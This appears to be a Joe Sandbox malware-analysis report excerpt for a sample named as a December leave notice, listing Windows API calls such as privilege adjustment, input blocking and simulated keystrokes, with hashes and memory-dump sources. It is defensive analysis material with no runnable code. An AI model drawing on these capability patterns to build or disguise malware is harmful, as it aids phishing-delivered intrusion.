• Instruction Fuzzy Hash: 2C41CE35A003029FDB18DF68C892EAAB3E4FF49324F10455DE95ACB3A1DB35E944DB91
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 12f236da4a72055a8ab43a44165ee3e3f6467eaefe38db1f08d77c111eca210d
• Instruction ID: 4a3118b8f8d85743b3cefe44a31e61c2a73bdc4e870bcdeae3be8fcfd8396be5
• Opcode Fuzzy Hash: 12f236da4a72055a8ab43a44165ee3e3f6467eaefe38db1f08d77c111eca210d
• Instruction Fuzzy Hash: BC119D327002516FE7226FA6DC44A6EBB98EF457A0F050429F84DD7281CF39E903A7A0
Strings
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
• Opcode ID: de319e216311cd41a0af64de7660cbf6cfa3c1c67a9eeeb5a389c3a7874f3a74
• Instruction ID: ab047f883b6bc708ab9b516cfa9bb3b017cc623a7d72f7f9aa46abce9bebadae
• Opcode Fuzzy Hash: de319e216311cd41a0af64de7660cbf6cfa3c1c67a9eeeb5a389c3a7874f3a74
• Instruction Fuzzy Hash: B4928B71E0421ACBEF25DF58C8407FDB7B1FB44314F1882AAE956AB280D7719981EF91
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00F9E014,75920AE0,00F9DEF1,0101DC38,?,?), ref: 00F9E02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F9E03E
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 15f1f3dde7518b3b5c408a59853fa32f73a2fb72d6a90b2860d945ed506e163f
• Instruction ID: c6c53eaf1b24c9c9220521b4e34c3591abcbc98e7fc759cc85fded21209beb30
• Opcode Fuzzy Hash: 15f1f3dde7518b3b5c408a59853fa32f73a2fb72d6a90b2860d945ed506e163f
• Instruction Fuzzy Hash: D2D0C771900712AFDB329FE6E81965276DDAB44711F18841DE4D5D2114FFF8D8849770
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FC13DC
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: d1516c1e7c04ac3db501c52c7c7289eea08bbe7f6da8aeef47d0e4d180b13cde
• Instruction ID: 9289f830d7fd877c4069b0fd0a2634ede00620f8b711bc21a72ec8a604a35c5e
• Opcode Fuzzy Hash: d1516c1e7c04ac3db501c52c7c7289eea08bbe7f6da8aeef47d0e4d180b13cde
• Instruction Fuzzy Hash: C8322575A006069FCB28CF69C581E6AB7F0FF49320B15C56EE49ADB3A2D770E951CB40
APIs
  • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00F9B22F
  • Part of subcall function 00F9B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F9B5A5
Similarity
• API ID: Proc$LongWindow
• String ID:
• API String ID: 2749884682-0
• Opcode ID: 3cc257031f00819d48e2fb48632a8d806b3cabd779e9445b946257da536245d5
• Instruction ID: 8e4282381600fd3e255a89ddb8935a18c69e45ae1dd1efbeac1267dab1b672c0
• Opcode Fuzzy Hash: 3cc257031f00819d48e2fb48632a8d806b3cabd779e9445b946257da536245d5
• Instruction Fuzzy Hash: CBA16771514108BAFF3AAF6A7E88E7F395EEF85760B14411DF541D21A1DB299C00B372
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00FD43BF,00000000), ref: 00FD4FA6
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00FD4FD2
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: dba6ab256c9bb631b8f455173aa2e45a46501d68d650877436e531dce0c38346
• Instruction ID: 94158b94f257ae1e2e90365216e355f6f987a5521b5b129e904c5548855851e4
• Opcode Fuzzy Hash: dba6ab256c9bb631b8f455173aa2e45a46501d68d650877436e531dce0c38346
• Instruction Fuzzy Hash: C241D672904605BFEB21CF84CC85FBF77AEEB40724F14402BF205A7290E675AE45B6A0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00FCE20D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FCE267
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FCE2B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: cd0e4065e84fba34a84fd26d2132ee04edd73be488eba77f88efd294db2f3467
                                                      • Instruction ID: 3b2fdd79548e9773b3f3d96cb8bb0cd566dde044ac008c8346f1c66c1088d7b5
                                                      • Opcode Fuzzy Hash: cd0e4065e84fba34a84fd26d2132ee04edd73be488eba77f88efd294db2f3467
                                                      • Instruction Fuzzy Hash: 80215C35A00118EFDB00EFA5D995EEDFBB8FF48310F0484A9E945A7351DB359905DB60
                                                      APIs
                                                        • Part of subcall function 00F9F4EA: std::exception::exception.LIBCMT ref: 00F9F51E
                                                        • Part of subcall function 00F9F4EA: __CxxThrowException@8.LIBCMT ref: 00F9F533
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FBB180
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FBB1AD
                                                      • GetLastError.KERNEL32 ref: 00FBB1BA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: 0c488b5df7f90778bcdd5d167355109779c7618139779730658a12256ef68c99
                                                      • Instruction ID: d77bdd54dd52224619c5c9d7dc63401243b0142090c77fde68429afdd6fe7479
                                                      • Opcode Fuzzy Hash: 0c488b5df7f90778bcdd5d167355109779c7618139779730658a12256ef68c99
                                                      • Instruction Fuzzy Hash: A311BFB2400205AFE728DF99DC85D6BB7ACEB44320B20852EF09693240DBB4FC418B60
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FC66AF
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00FC66EC
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FC66F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: a58450c9cabf56dd2473f5b33ba3b158321dcb61f26d1de1d4847f350cd2fe6c
                                                      • Instruction ID: f17967274b9fea4d1d5586c4ff26d155978d845258566bef102d83363af7cfce
                                                      • Opcode Fuzzy Hash: a58450c9cabf56dd2473f5b33ba3b158321dcb61f26d1de1d4847f350cd2fe6c
                                                      • Instruction Fuzzy Hash: 0D11A5B1D00229BFE7119BE8DD45FAF7BBCEB04724F004555F901E7180C2789E0497A1
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00FC7223
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FC723A
                                                      • FreeSid.ADVAPI32(?), ref: 00FC724A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: 095d9c60462a12e306f5ebcad53d9da7e3ab532fe541cce9df9372d74a1891d3
                                                      • Instruction ID: 7b9ad3406d3f4a937c8429fa02210e1142982f4b75124465d37ebaf365173de0
                                                      • Opcode Fuzzy Hash: 095d9c60462a12e306f5ebcad53d9da7e3ab532fe541cce9df9372d74a1891d3
                                                      • Instruction Fuzzy Hash: 2BF01D76E04309BFDF05DFE4D989EEEBBB8EF08201F104469B606E2181E2759A549B20
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FCF599
                                                      • FindClose.KERNEL32(00000000), ref: 00FCF5C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 0bd251ab2046f9d82229c7fea46813455bf3a983ac3a6bc3ed4a553a9b763972
                                                      • Instruction ID: 43bc3126f978e7d6a583297989f908bd14ccb6cff3b6e256c18fadae6d885623
                                                      • Opcode Fuzzy Hash: 0bd251ab2046f9d82229c7fea46813455bf3a983ac3a6bc3ed4a553a9b763972
                                                      • Instruction Fuzzy Hash: 6611A5326002019FD710EF68D845A6EF3E9FF84324F04891DF9A5D7391CB34E9049B91
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00FDBE6A,?,?,00000000,?), ref: 00FCCEA7
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00FDBE6A,?,?,00000000,?), ref: 00FCCEB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: ef65653873d4b8d0a3c709de6d41eca1ddb1f197785bb1db0f16f9fc4f69f119
                                                      • Instruction ID: 495d3bbb7368f9d13232a0817d23131fe592315978c5eb621ef2d7e399d8f4f8
                                                      • Opcode Fuzzy Hash: ef65653873d4b8d0a3c709de6d41eca1ddb1f197785bb1db0f16f9fc4f69f119
                                                      • Instruction Fuzzy Hash: D9F0EC3100022AABDB20ABE0CC49FEA336CBF093A1F00812AF809D6080C6349A40DBB0
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00FC4153
                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00FC4166
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: 5168317b17685ba3c30486a05a3bb8bfa6ddd6ce97dcbd8ebac394fe2dd72b07
                                                      • Instruction ID: 4c9c5d2f1c3c361ae04c706e84ed5a3786b40a15802fef34a50ef2893f93a48c
                                                      • Opcode Fuzzy Hash: 5168317b17685ba3c30486a05a3bb8bfa6ddd6ce97dcbd8ebac394fe2dd72b07
                                                      • Instruction Fuzzy Hash: F4F06D7080024EAFDB168FA0C805BBE7FB0EF00305F048009F9A596191D77A96129FA0
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FBACC0), ref: 00FBAB99
                                                      • CloseHandle.KERNEL32(?,?,00FBACC0), ref: 00FBABAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: f864e7766674baa7ac0c4a4341ec05d3700611311a8800cd16730caad3db06bd
                                                      • Instruction ID: b369f20cff40af138c3e0fe3235bb8270654c46833a6654927c85d06ccc72eb1
                                                      • Opcode Fuzzy Hash: f864e7766674baa7ac0c4a4341ec05d3700611311a8800cd16730caad3db06bd
                                                      • Instruction Fuzzy Hash: 21E0BF75000510AFEB262F95EC05D767BA9EB04320B15C529B49981474DB675D94AB50
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00FA6DB3,-0000031A,?,?,00000001), ref: 00FA81B1
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FA81BA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: ded29e05faed25f362e4a15ef5ee77f738b744d3179e06db6336f626e5967061
                                                      • Instruction ID: 51077d72474791db714b4259c406eb778a5fed600cb321044047f1b59f32f38e
                                                      • Opcode Fuzzy Hash: ded29e05faed25f362e4a15ef5ee77f738b744d3179e06db6336f626e5967061
                                                      • Instruction Fuzzy Hash: 5CB09271048608ABDB222BE1E809B587F68EB08652F008010F64D440558B7754109BA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 0a8c975bab3e43d6ad8fb45cacbb2e7700bbaf7fbd26bad520e2266310beb8eb
                                                      • Instruction ID: 1bf63db517e5f91a814ea69417e7af786194d2c7c101e784e48533bafa391784
                                                      • Opcode Fuzzy Hash: 0a8c975bab3e43d6ad8fb45cacbb2e7700bbaf7fbd26bad520e2266310beb8eb
                                                      • Instruction Fuzzy Hash: C7A25971E04219CFDB25DF58C8807EDBBB1BF48354F2581A9E859AB391D7349E81EB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cdfe6eec046aeff0c6c97b025068ba95e4917b0d998a22e7fe7a0832665d8af8
                                                      • Instruction ID: ba5de9ad07e515ff81b39329707235c9066722cd9f6bf0c07ab8a3d825d00570
                                                      • Opcode Fuzzy Hash: cdfe6eec046aeff0c6c97b025068ba95e4917b0d998a22e7fe7a0832665d8af8
                                                      • Instruction Fuzzy Hash: AC320372D29F014DD7239534D822336A298AFB73D4F25D727F85AB5E9AEB2DC4835200
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID:
                                                      • API String ID: 674341424-0
                                                      • Opcode ID: cb8bc8eaa8e5e9e496f26242250befe70cfc0a924d5dbbba410cf52cfe77c9d7
                                                      • Instruction ID: 45485145373c3f924a2b012c268e9868d2249f90015843714d1ad237c4d30d96
                                                      • Opcode Fuzzy Hash: cb8bc8eaa8e5e9e496f26242250befe70cfc0a924d5dbbba410cf52cfe77c9d7
                                                      • Instruction Fuzzy Hash: 2722CF716083059FD724EF14C891BAFB7E4EF84310F14491DF99A972A1DBB5E904EB82
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e96b3a5b359109c2a7ed8185533df9c1c69fc7f0842b70f6bfe304a4fc94e05
                                                      • Instruction ID: 5d115c7a394ca58a469bbdb04fce585a097dc2c6fbed6934d64a345d1e50a601
                                                      • Opcode Fuzzy Hash: 4e96b3a5b359109c2a7ed8185533df9c1c69fc7f0842b70f6bfe304a4fc94e05
                                                      • Instruction Fuzzy Hash: 5DB1D030D2AF414DD22396398831336B65CAFFB2D5F91D71BFC5A78D56EB2A85834280
                                                      APIs
                                                      • __time64.LIBCMT ref: 00FCB6DF
                                                        • Part of subcall function 00FA344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FCBDC3,00000000,?,?,?,?,00FCBF70,00000000,?), ref: 00FA3453
                                                        • Part of subcall function 00FA344A: __aulldiv.LIBCMT ref: 00FA3473
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2893107130-0
                                                      • Opcode ID: dcce3ef31d578fb830ef12e3e61f0db786ca9cb153fdcc4adee57867163a2c8f
                                                      • Instruction ID: 6de861d51ac98c5797f249fa885876b2787609ad9b87d16895a49499dc9923ae
                                                      • Opcode Fuzzy Hash: dcce3ef31d578fb830ef12e3e61f0db786ca9cb153fdcc4adee57867163a2c8f
                                                      • Instruction Fuzzy Hash: 1121AF766345118BC729CF28C482B92B7E5EB95321B248E6DE4E5CF2C0CB78B905DB54
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00FD6ACA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 450a5183acc3546c714cce6c9c90b01479b7bb92af8e32c6436502fe00e76717
                                                      • Instruction ID: 4b450262973db527cdc86e7a1187dc964904c27ce88e7ba96ae51c2afef93af3
                                                      • Opcode Fuzzy Hash: 450a5183acc3546c714cce6c9c90b01479b7bb92af8e32c6436502fe00e76717
                                                      • Instruction Fuzzy Hash: 8AE012362102046FD740EB99D80499AB7EDAF68761F058416E985D7391DAB4E8049BA0
                                                      APIs
                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00FC750A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: bd6848bc04b66c24635b9425c5f397b8d2fb99a03fbfbede56ac9ef6c3d3a7c4
                                                      • Instruction ID: 9ed2976000c09526b216474f8214498e0ddeec7debdebe67830d1b5221e7f320
                                                      • Opcode Fuzzy Hash: bd6848bc04b66c24635b9425c5f397b8d2fb99a03fbfbede56ac9ef6c3d3a7c4
